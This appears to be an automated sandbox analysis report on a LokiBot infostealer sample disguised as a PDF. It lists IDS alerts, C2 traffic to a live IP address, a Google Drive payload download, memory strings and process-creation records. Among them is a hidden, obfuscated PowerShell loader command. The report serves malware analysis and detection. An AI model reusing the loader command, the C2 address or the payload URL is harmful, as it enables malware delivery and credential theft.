              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 45.61.136.239:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 45.61.136.239:80
              Source: Joe Sandbox ViewIP Address: 45.61.136.239 45.61.136.239
              Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 165Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: unknownTCP traffic detected without corresponding DNS query: 45.61.136.239
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: unknownHTTP traffic detected: POST /index.php/54596186971079 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.136.239Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC0E2304Content-Length: 192Connection: close
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.239/index.php/54596186971079
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.61.136.239/index.php/54596186971079qc
              Source: powershell.exe, 00000002.00000002.1608481030.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000002.00000002.1602438501.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coL
              Source: powershell.exe, 00000002.00000002.1602438501.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe, BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: wab.exe, 0000000E.00000002.2447762936.0000000005AD0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM03
              Source: wab.exe, 0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0h
              Source: wab.exe, 0000000E.00000002.2447479281.0000000005A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2447479281.0000000005998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dcAzz5Trh2GumXxq4vI6xXhldh_w3zM0&export=download
              Source: powershell.exe, 00000002.00000002.1602438501.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1606089410.0000000006528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: wab.exe, 0000000E.00000003.1582626382.0000000005A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49707 version: TLS 1.2

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeJump to dropped file
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403311
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeFile created: C:\Windows\SysWOW64\doddersJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_035DF0002_2_035DF000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_035DF8D02_2_035DF8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_035DECB82_2_035DECB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C6C2282_2_07C6C228
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E025D314_2_00E025D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E01C5C14_2_00E01C5C
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: invalid certificate
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/16@2/3
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeCode function: 0_2_00403311 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403311
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\twinsomenessJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsl7165.tmpJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCommand line argument: WABOpen14_2_00E01C5C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCommand line argument: 514_2_00E03530
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, 0000000E.00000003.1601955564.0000000002E95000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeReversingLabs: Detection: 16%
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeFile read: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: ntmarta.dllJump to behavior
